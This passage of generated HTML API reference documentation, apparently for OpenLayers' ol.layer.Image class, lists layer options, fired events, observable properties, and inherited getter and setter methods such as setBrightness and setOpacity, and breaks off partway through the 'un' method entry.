<td class="name"><code>options</code></td>
<td colspan=2 class="description last">
<p>Layer options.</p>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="unstable">
<td class="name"><code>brightness</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<span class="stability experimental">experimental</span>
<p>Brightness. Default is <code>0</code>.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>contrast</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<span class="stability experimental">experimental</span>
<p>Contrast. Default is <code>1</code>.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>hue</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<span class="stability experimental">experimental</span>
<p>Hue. Default is <code>0</code>.</p></td>
</tr>
<tr class="">
<td class="name"><code>opacity</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<p>Opacity (0, 1). Default is <code>1</code>.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>saturation</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<span class="stability experimental">experimental</span>
<p>Saturation. Default is <code>1</code>.</p></td>
</tr>
<tr class="">
<td class="name"><code>source</code></td>
<td class="type">
<span class="param-type"><a href="ol.source.Image.html">ol.source.Image</a></span>
</td>
<td class="description last">
<p>Source for this layer.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>map</code></td>
<td class="type">
<span class="param-type"><a href="ol.Map.html">ol.Map</a></span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<span class="stability experimental">experimental</span>
<p>Sets the layer as overlay on a map. The map will not manage this layer in its
layers collection, and the layer will be rendered on top. This is useful for
temporary layers. The standard way to add a layer to a map and have it
managed by the map is to use <a href="ol.Map.html#addLayer"><code>ol.Map#addLayer</code></a>.</p></td>
</tr>
<tr class="">
<td class="name"><code>visible</code></td>
<td class="type">
<span class="param-type">boolean</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<p>Visibility. Default is <code>true</code> (visible).</p></td>
</tr>
<tr class="">
<td class="name"><code>extent</code></td>
<td class="type">
<span class="param-type"><a href="ol.html#Extent">ol.Extent</a></span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<p>The bounding extent for layer rendering. The layer will not be rendered
outside of this extent.</p></td>
</tr>
<tr class="">
<td class="name"><code>minResolution</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<p>The minimum resolution (inclusive) at which this layer will be visible.</p></td>
</tr>
<tr class="">
<td class="name"><code>maxResolution</code></td>
<td class="type">
<span class="param-type">number</span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<p>The maximum resolution (exclusive) below which this layer will be visible.</p></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
<h5>Fires:</h5>
<ul>
<li class="">
<code>change</code>
-
Triggered when the state of the source changes.
</li>
<li class="">
<code>change:brightness</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:contrast</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:extent</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:hue</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:maxResolution</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:minResolution</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:opacity</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:saturation</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:source</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="">
<code>change:visible</code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
</li>
<li class="unstable">
<code><a href="ol.render.Event.html#event:postcompose">postcompose</a></code>
(<a href="ol.render.Event.html">ol.render.Event</a>)
<span class="stability experimental">experimental</span>
</li>
<li class="unstable">
<code><a href="ol.render.Event.html#event:precompose">precompose</a></code>
(<a href="ol.render.Event.html">ol.render.Event</a>)
<span class="stability experimental">experimental</span>
</li>
<li class="">
<code><a href="ol.ObjectEvent.html#event:propertychange">propertychange</a></code>
(<a href="ol.ObjectEvent.html">ol.ObjectEvent</a>)
-
Triggered when a property is changed.
</li>
<li class="unstable">
<code><a href="ol.render.Event.html#event:render">render</a></code>
(<a href="ol.render.Event.html">ol.render.Event</a>)
<span class="stability experimental">experimental</span>
</li>
</ul>
</dd>
</div>
<h3 class="subsection-title">Extends</h3>
<ul>
<li><a href="ol.layer.Layer.html">ol.layer.Layer</a></li>
</ul>
<h3 class="subsection-title">Observable Properties</h3>
<dl>
<table class="props">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Settable</th>
<th><a href="ol.ObjectEvent.html">ol.ObjectEvent</a> type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="unstable">
<td class="name"><code>brightness</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:brightness</code></td>
<td class="description last"><p>The brightness of the layer.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>contrast</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:contrast</code></td>
<td class="description last"><p>The contrast of the layer.</p></td>
</tr>
<tr class="">
<td class="name"><code>extent</code></td>
<td class="type">
<span class="param-type"><a href="ol.html#Extent">ol.Extent</a></span>
|
<span class="param-type">undefined</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:extent</code></td>
<td class="description last"><p>The layer extent.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>hue</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:hue</code></td>
<td class="description last"><p>The hue of the layer.</p></td>
</tr>
<tr class="">
<td class="name"><code>maxResolution</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:maxresolution</code></td>
<td class="description last"><p>The maximum resolution of the layer.</p></td>
</tr>
<tr class="">
<td class="name"><code>minResolution</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:minresolution</code></td>
<td class="description last"><p>The minimum resolution of the layer.</p></td>
</tr>
<tr class="">
<td class="name"><code>opacity</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:opacity</code></td>
<td class="description last"><p>The opacity of the layer.</p></td>
</tr>
<tr class="unstable">
<td class="name"><code>saturation</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:saturation</code></td>
<td class="description last"><p>The saturation of the layer.</p></td>
</tr>
<tr class="">
<td class="name"><code>source</code></td>
<td class="type">
<span class="param-type"><a href="ol.source.Source.html">ol.source.Source</a></span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:source</code></td>
<td class="description last"><p>The layer source (or <code>null</code> if not yet set).</p></td>
</tr>
<tr class="">
<td class="name"><code>visible</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="setter">yes</td>
<td class="event"><code>change:visible</code></td>
<td class="description last"><p>The visibility of the layer.</p></td>
</tr>
</tbody>
</table>
</dl>
<h3 class="subsection-title">Methods</h3>
<dl>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="changed">
changed<span class="signature">()</span>
<span class="inherited"><a href="ol.Observable.html#changed">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/observable.js, line 52
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Increases the revision counter and dispatches a 'change' event.</p>
</div>
<dl class="details">
</dl>
<h5>Fires:</h5>
<ul>
<li class="unstable">
<code>change</code>
<span class="stability experimental">experimental</span>
</li>
</ul>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="get">
get<span class="signature">(key)</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{*}</span>
<span class="inherited"><a href="ol.Object.html#get">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/object.js, line 150
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Gets a value.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last">
<p>Key name.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
<h5>Returns:</h5>
Value.
<br />
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="getBrightness">
getBrightness<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getBrightness">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 96
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Return the brightness of the layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The brightness of the layer.
<br />
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="getContrast">
getContrast<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getContrast">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 107
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Return the contrast of the layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The contrast of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getExtent">
getExtent<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{<a href="ol.html#Extent">ol.Extent</a>|undefined}</span>
<span class="inherited"><a href="ol.layer.Base.html#getExtent">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 177
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Return the <a href="ol.html#Extent"><code>extent</code></a> of the layer or <code>undefined</code> if it
will be visible regardless of extent.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The layer extent.
<br />
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="getHue">
getHue<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getHue">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 118
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Return the hue of the layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The hue of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getKeys">
getKeys<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{Array.<string>}</span>
<span class="inherited"><a href="ol.Object.html#getKeys">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/object.js, line 164
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Get a list of object property names.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
List of property names.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getMaxResolution">
getMaxResolution<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getMaxResolution">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 189
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Return the maximum resolution of the layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The maximum resolution of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getMinResolution">
getMinResolution<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getMinResolution">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 201
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Return the minimum resolution of the layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The minimum resolution of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getOpacity">
getOpacity<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getOpacity">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 213
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Return the opacity of the layer (between 0 and 1).</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The opacity of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getProperties">
getProperties<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{Object.<string, *>}</span>
<span class="inherited"><a href="ol.Object.html#getProperties">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/object.js, line 174
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Get an object of all property names and values.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
Object.
<br />
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="getRevision">
getRevision<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.Observable.html#getRevision">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/observable.js, line 62
</div>
</div>
</dt>
<dd class="unstable">
<dl class="details">
</dl>
<h5>Returns:</h5>
Revision.
<br />
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="getSaturation">
getSaturation<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{number}</span>
<span class="inherited"><a href="ol.layer.Base.html#getSaturation">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 224
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Return the saturation of the layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The saturation of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer">
<h4 class="name" id="getSource">
getSource<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{<a href="ol.source.Image.html">ol.source.Image</a>}</span>
</h4>
<div class="tag-source">
src/ol/layer/imagelayer.js, line 34
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Return the associated <a href="ol.source.Image.html"><code>source</code></a> of the image layer.</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
Source.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="getVisible">
getVisible<span class="signature">()</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{boolean}</span>
<span class="inherited"><a href="ol.layer.Base.html#getVisible">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 241
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Return the visibility of the layer (<code>true</code> or <code>false</code>).</p>
</div>
<dl class="details">
</dl>
<h5>Returns:</h5>
The visibility of the layer.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="on">
on<span class="signature">(type, listener, <span class="optional">opt_this</span>)</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{goog.events.Key}</span>
<span class="inherited"><a href="ol.Observable.html#on">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/observable.js, line 75
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Listen for a certain type of event.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>type</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type">Array.<string></span>
</td>
<td class="description last">
<p>The event type or array of event types.</p></td>
</tr>
<tr class="">
<td class="name"><code>listener</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last">
<p>The listener function.</p></td>
</tr>
<tr class="">
<td class="name"><code>this</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last">
<p>The object to use as <code>this</code> in <code>listener</code>.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
<h5>Returns:</h5>
Unique key for the listener.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="once">
once<span class="signature">(type, listener, <span class="optional">opt_this</span>)</span><span class="glyphicon glyphicon-circle-arrow-right"></span><span class="type-signature returnType">{goog.events.Key}</span>
<span class="inherited"><a href="ol.Observable.html#once">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/observable.js, line 88
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Listen once for a certain type of event.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>type</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type">Array.<string></span>
</td>
<td class="description last">
<p>The event type or array of event types.</p></td>
</tr>
<tr class="">
<td class="name"><code>listener</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last">
<p>The listener function.</p></td>
</tr>
<tr class="">
<td class="name"><code>this</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last">
<p>The object to use as <code>this</code> in <code>listener</code>.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
<h5>Returns:</h5>
Unique key for the listener.
<br />
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="set">
set<span class="signature">(key, value)</span>
<span class="inherited"><a href="ol.Object.html#set">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/object.js, line 203
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Sets a value.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last">
<p>Key name.</p></td>
</tr>
<tr class="">
<td class="name"><code>value</code></td>
<td class="type">
<span class="param-type">*</span>
</td>
<td class="description last">
<p>Value.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="setBrightness">
setBrightness<span class="signature">(brightness)</span>
<span class="inherited"><a href="ol.layer.Base.html#setBrightness">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 268
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Adjust the layer brightness. A value of -1 will render the layer completely
black. A value of 0 will leave the brightness unchanged. A value of 1 will
render the layer completely white. Other values are linear multipliers on
the effect (values are clamped between -1 and 1).</p>
<p>The filter effects draft [1] says the brightness function is supposed to
render 0 black, 1 unchanged, and all other values as a linear multiplier.</p>
<p>The current WebKit implementation clamps values between -1 (black) and 1
(white) [2]. There is a bug open to change the filter effect spec [3].</p>
<p>TODO: revisit this if the spec is still unmodified before we release</p>
<p>[1] https://dvcs.w3.org/hg/FXTF/raw-file/tip/filters/index.html
[2] https://github.com/WebKit/webkit/commit/8f4765e569
[3] https://www.w3.org/Bugs/Public/show_bug.cgi?id=15647</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>brightness</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The brightness of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="setContrast">
setContrast<span class="signature">(contrast)</span>
<span class="inherited"><a href="ol.layer.Base.html#setContrast">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 282
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Adjust the layer contrast. A value of 0 will render the layer completely
grey. A value of 1 will leave the contrast unchanged. Other values are
linear multipliers on the effect (and values over 1 are permitted).</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>contrast</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The contrast of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setExtent">
setExtent<span class="signature">(extent)</span>
<span class="inherited"><a href="ol.layer.Base.html#setExtent">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 306
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Set the extent at which the layer is visible. If <code>undefined</code>, the layer
will be visible at all extents.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>extent</code></td>
<td class="type">
<span class="param-type"><a href="ol.html#Extent">ol.Extent</a></span>
|
<span class="param-type">undefined</span>
</td>
<td class="description last">
<p>The extent of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="setHue">
setHue<span class="signature">(hue)</span>
<span class="inherited"><a href="ol.layer.Base.html#setHue">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 294
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Apply a hue-rotation to the layer. A value of 0 will leave the hue
unchanged. Other values are radians around the color circle.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>hue</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The hue of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="setMap">
setMap<span class="signature">(map)</span>
<span class="inherited"><a href="ol.layer.Layer.html#setMap">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layer.js, line 158
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Sets the layer to be rendered on a map. The map will not manage this layer in
its layers collection, and the layer will be rendered on top. This is useful
for temporary layers. To remove an unmanaged layer from the map, use
<code>#setMap(null)</code>. To add the layer to a map and have it managed by the map,
use <a href="ol.Map.html#addLayer"><code>ol.Map#addLayer</code></a> instead.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>map</code></td>
<td class="type">
<span class="param-type"><a href="ol.Map.html">ol.Map</a></span>
</td>
<td class="description last">
<p>Map.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setMaxResolution">
setMaxResolution<span class="signature">(maxResolution)</span>
<span class="inherited"><a href="ol.layer.Base.html#setMaxResolution">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 317
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Set the maximum resolution at which the layer is visible.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>maxResolution</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The maximum resolution of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setMinResolution">
setMinResolution<span class="signature">(minResolution)</span>
<span class="inherited"><a href="ol.layer.Base.html#setMinResolution">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 328
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Set the minimum resolution at which the layer is visible.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>minResolution</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The minimum resolution of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setOpacity">
setOpacity<span class="signature">(opacity)</span>
<span class="inherited"><a href="ol.layer.Base.html#setOpacity">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 339
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Set the opacity of the layer, allowed values range from 0 to 1.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>opacity</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The opacity of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setProperties">
setProperties<span class="signature">(values)</span>
<span class="inherited"><a href="ol.Object.html#setProperties">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/object.js, line 216
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Sets a collection of key-value pairs. Note that this changes any existing
properties and adds new ones (it does not remove any existing properties).</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>values</code></td>
<td class="type">
<span class="param-type">Object.<string, *></span>
</td>
<td class="description last">
<p>Values.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="unstable">
<div class="nameContainer inherited">
<h4 class="name" id="setSaturation">
setSaturation<span class="signature">(saturation)</span>
<span class="inherited"><a href="ol.layer.Base.html#setSaturation">inherited</a></span>
<span class="stability experimental">experimental</span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 354
</div>
</div>
</dt>
<dd class="unstable">
<div class="description">
<p>Adjust layer saturation. A value of 0 will render the layer completely
unsaturated. A value of 1 will leave the saturation unchanged. Other
values are linear multipliers of the effect (and values over 1 are
permitted).</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>saturation</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last">
<p>The saturation of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setSource">
setSource<span class="signature">(source)</span>
<span class="inherited"><a href="ol.layer.Layer.html#setSource">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layer.js, line 182
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Set the layer source.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>source</code></td>
<td class="type">
<span class="param-type"><a href="ol.source.Source.html">ol.source.Source</a></span>
</td>
<td class="description last">
<p>The layer source.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="setVisible">
setVisible<span class="signature">(visible)</span>
<span class="inherited"><a href="ol.layer.Base.html#setVisible">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/layer/layerbase.js, line 365
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Set the visibility of the layer (<code>true</code> or <code>false</code>).</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>visible</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last">
<p>The visibility of the layer.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="un">
un<span class="signature">(type, listener, <span class="optional">opt_this</span>)</span>
<span class="inherited"><a href="ol.Observable.html#un">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/observable.js, line 101
